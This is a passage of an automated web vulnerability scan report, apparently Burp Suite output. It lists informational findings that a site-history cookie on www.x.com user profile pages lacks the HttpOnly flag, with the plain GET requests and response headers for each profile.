Host:   https://www.x.com
Path:   /people/CorinneSherman

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /people/CorinneSherman HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:53 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=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; Expires=Sun, 11-Sep-2011 13:51:54 GMT; Path=/
Vary: User-Agent
JP: D=153786 t=1313157114086096
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.172. https://www.x.com/people/GiancarloUk2

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/GiancarloUk2

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /people/GiancarloUk2 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:52:28 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c38383139383b332c3131353037373b332c3130383730353b332c3131303734313b332c3131303831343b332c38323534333b332c3131353130373b332c38353530363b332c3131313737343b332c38373839383b; Expires=Sun, 11-Sep-2011 13:52:29 GMT; Path=/
Vary: User-Agent
JP: D=109527 t=1313157149159421
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.173. https://www.x.com/people/IndieReign

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/IndieReign

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /people/IndieReign HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:52:30 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c3134303730373b332c38383139383b332c38373839383b332c3134313133383b332c38353530363b332c3134303532383b332c3131353130373b332c3131303734313b332c3131313737343b332c3131353037373b; Expires=Sun, 11-Sep-2011 13:52:30 GMT; Path=/
Vary: User-Agent
JP: D=98253 t=1313157150770204
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.174. https://www.x.com/people/JasonVenner

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/JasonVenner

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /people/JasonVenner HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:49 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=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; Expires=Sun, 11-Sep-2011 13:51:49 GMT; Path=/
Vary: User-Agent
JP: D=146802 t=1313157109565171
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.175. https://www.x.com/people/MrcheckAPX

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/MrcheckAPX

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /people/MrcheckAPX HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:52:47 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b332c38393734373b332c3133393930333b332c3134303730373b33382c363333363b; Expires=Sun, 11-Sep-2011 13:52:48 GMT; Path=/
Vary: User-Agent
JP: D=97089 t=1313157168042186
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.176. https://www.x.com/people/PP_Igor

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/PP_Igor

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /people/PP_Igor HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:52:09 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323032343b31342c323232363b31342c323037333b31342c323030323b31342c323135343b31342c323131353b31342c323131313b31342c323134393b31342c323038363b31342c323038323b33382c343431363b33382c323436353b33382c353534353b33382c333337373b33382c353939353b33382c363030363b33382c363039373b33382c363133383b33382c363233383b33382c363238353b3130322c313130363b3130322c333831313b332c34383739343b332c31303737303b332c31393037313b332c33353136303b332c35333639373b332c38383732373b332c39343632373b332c38303434333b332c36363938333b332c37383635393b; Expires=Sun, 11-Sep-2011 13:52:09 GMT; Path=/
Vary: User-Agent
JP: D=77818 t=1313157129602041
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.177. https://www.x.com/people/PP_MTS_Andre

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/PP_MTS_Andre

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /people/PP_MTS_Andre HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:52:05 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=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; Expires=Sun, 11-Sep-2011 13:52:06 GMT; Path=/
Vary: User-Agent
JP: D=85787 t=1313157126041615
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.178. https://www.x.com/people/PP_MTS_Chad

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/PP_MTS_Chad

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /people/PP_MTS_Chad HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:52:03 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=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; Expires=Sun, 11-Sep-2011 13:52:04 GMT; Path=/
Vary: User-Agent
JP: D=167980 t=1313157123846369
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.179. https://www.x.com/people/PP_MTS_GuidoT

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/PP_MTS_GuidoT

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /people/PP_MTS_GuidoT HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:52:07 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=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; Expires=Sun, 11-Sep-2011 13:52:07 GMT; Path=/
Vary: User-Agent
JP: D=96030 t=1313157127847926
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.180. https://www.x.com/people/PP_MTS_Magarvin

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/PP_MTS_Magarvin

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /people/PP_MTS_Magarvin HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:52:03 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=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; Expires=Sun, 11-Sep-2011 13:52:04 GMT; Path=/
Vary: User-Agent
JP: D=130947 t=1313157124385931
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.181. https://www.x.com/people/PP_MTS_Patrick

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/PP_MTS_Patrick

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /people/PP_MTS_Patrick HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:52:12 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=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; Expires=Sun, 11-Sep-2011 13:52:13 GMT; Path=/
Vary: User-Agent
JP: D=143994 t=1313157132945144
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.182. https://www.x.com/people/PayPalXadmin

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/PayPalXadmin

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /people/PayPalXadmin HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:52:39 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c323030313b332c313b332c38393734373b332c3133393930333b332c3134303730373b332c3134303532383b332c3134313133383b332c38383139383b332c38373839383b332c38353530363b33382c363333363b; Expires=Sun, 11-Sep-2011 13:52:39 GMT; Path=/
Vary: User-Agent
JP: D=96924 t=1313157159108661
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.183. https://www.x.com/people/PayPal_Carolyn

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/PayPal_Carolyn

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /people/PayPal_Carolyn HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:51 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=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; Expires=Sun, 11-Sep-2011 13:51:51 GMT; Path=/
Vary: User-Agent
JP: D=182753 t=1313157111682138
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.184. https://www.x.com/people/PayPal_Sudha

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/PayPal_Sudha

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /people/PayPal_Sudha HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:52 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=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; Expires=Sun, 11-Sep-2011 13:51:52 GMT; Path=/
Vary: User-Agent
JP: D=104130 t=1313157112744233
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.185. https://www.x.com/people/PayPal_ToddS

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/PayPal_ToddS

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /people/PayPal_ToddS HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:52:14 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=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; Expires=Sun, 11-Sep-2011 13:52:14 GMT; Path=/
Vary: User-Agent
JP: D=172832 t=1313157134792842
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.186. https://www.x.com/people/Praveen

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/Praveen

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /people/Praveen HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:52 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323032343b31342c323232363b31342c323037333b31342c323030323b31342c323135343b31342c323131353b31342c323131313b31342c323134393b31342c323038363b31342c323038323b33382c323436353b33382c353534353b33382c333337373b33382c353939353b33382c363030363b33382c363039373b33382c363133383b33382c363233383b33382c363238353b33382c363330313b3130322c313130363b3130322c333831313b332c35353331393b332c35373137393b332c35333436333b332c35333437343b332c323030383b332c3133363935343b332c3133373131353b332c36303039313b332c35333735313b332c3133383538323b; Expires=Sun, 11-Sep-2011 13:51:53 GMT; Path=/
Vary: User-Agent
JP: D=139937 t=1313157113112925
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.187. https://www.x.com/people/Praveen/blog/2011/01/31/icanhas-instant-app-approval

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/Praveen/blog/2011/01/31/icanhas-instant-app-approval

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /people/Praveen/blog/2011/01/31/icanhas-instant-app-approval HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:53 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=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; Expires=Sun, 11-Sep-2011 13:51:53 GMT; Path=/
Vary: User-Agent
JP: D=129836 t=1313157113665921
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.188. https://www.x.com/people/RightWayMail

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/RightWayMail

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /people/RightWayMail HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:52:28 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c3134313133383b332c3131353037373b332c38323534333b332c3130383730353b332c3131303831343b332c38383139383b332c3131303734313b332c3131353130373b332c38353530363b332c3131313737343b; Expires=Sun, 11-Sep-2011 13:52:29 GMT; Path=/
Vary: User-Agent
JP: D=143442 t=1313157149181583
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.189. https://www.x.com/people/S.Aijaz

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/S.Aijaz

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /people/S.Aijaz HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:52:11 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=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; Expires=Sun, 11-Sep-2011 13:52:11 GMT; Path=/
Vary: User-Agent
JP: D=107761 t=1313157131723635
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.190. https://www.x.com/people/SRS

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/SRS

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /people/SRS HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:52:28 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c38373839383b332c3133383934323b332c3131363438333b332c32333938353b332c3131303838353b332c33393238333b332c3131383939313b332c3134313133383b332c39323635363b332c3132323433393b; Expires=Sun, 11-Sep-2011 13:52:28 GMT; Path=/
Vary: User-Agent
JP: D=95619 t=1313157148836785
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.191. https://www.x.com/people/Saleem

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/Saleem

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /people/Saleem HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:51 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323032343b31342c323232363b31342c323037333b31342c323030323b31342c323135343b31342c323131353b31342c323131313b31342c323134393b31342c323038363b31342c323038323b33382c323436353b33382c353534353b33382c333337373b33382c353939353b33382c363030363b33382c363039373b33382c363133383b33382c363233383b33382c363238353b33382c363330313b3130322c313130363b3130322c333831313b332c35333437343b332c3133373131353b332c3133363935343b332c35333735313b332c36303039313b332c323030383b332c3133383538323b332c3133373331333b332c35353331393b332c3133363236393b; Expires=Sun, 11-Sep-2011 13:51:52 GMT; Path=/
Vary: User-Agent
JP: D=174302 t=1313157112089068
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.192. https://www.x.com/people/Shade8934

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/Shade8934

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /people/Shade8934 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:50 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=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; Expires=Sun, 11-Sep-2011 13:51:50 GMT; Path=/
Vary: User-Agent
JP: D=78825 t=1313157110665049
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.193. https://www.x.com/people/Suneetha

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/Suneetha

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /people/Suneetha HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:52:12 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=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; Expires=Sun, 11-Sep-2011 13:52:12 GMT; Path=/
Vary: User-Agent
JP: D=77775 t=1313157132121636
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.194. https://www.x.com/people/admin

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/admin

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /people/admin HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:52:36 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c313b332c38393734373b332c3133393930333b332c3134303730373b332c3134303532383b332c3134313133383b332c38383139383b332c38373839383b332c38353530363b332c3131353130373b33382c363333363b; Expires=Sun, 11-Sep-2011 13:52:37 GMT; Path=/
Vary: User-Agent
JP: D=92314 t=1313157157248318
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.195. https://www.x.com/people/amypiazza00

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/amypiazza00

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /people/amypiazza00 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
